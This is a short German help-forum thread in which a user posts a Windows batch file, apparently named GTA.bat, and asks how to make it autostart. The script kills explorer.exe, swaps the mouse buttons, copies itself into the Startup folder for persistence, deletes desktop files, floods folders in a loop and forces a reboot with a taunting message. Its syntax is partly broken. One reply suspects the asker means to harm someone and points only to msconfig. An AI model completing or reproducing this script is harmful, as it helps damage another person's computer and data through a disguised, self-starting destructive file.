Frage von Medionnn, 12

ich mache grade eine .bat datei.... ich möchte das der eine bestimmte datei in den auto start macht was ich bei der datei stehen habe (siehe details)?

@echo off

taskkill /IM explorer.exe /f

Rundll32 user32, SwapMouseButton

copy /A c:\Desktop\ GTA.bat /A /V C:\programdata\microsoft\windows\start menu\programs\startup

Set Date=1 Time 0:00

cd %userprofile%\desktop For %%A IN (.) DO DEL %%A

cd %userprofile%\desktop For %%A IN (.) DO DEL %%A

cd %userprofile%\desktop

:loop md %random% md %random% goto loop

C:\Windows\System32\shutdown.exe -r -t 10 -c "viel spass"

Antwort
von iNsaNe744, 9

Scheint mir, als ob du jemandem damit schaden möchtest. Das würde ich an deiner Stelle nicht tun.

Du kannst allgemein in den PC-Einstellungen oder unter msconfig deine Starteinstellungen ändern. Lg

Keine passende Antwort gefunden?

Fragen Sie die Community

Weitere Fragen mit Antworten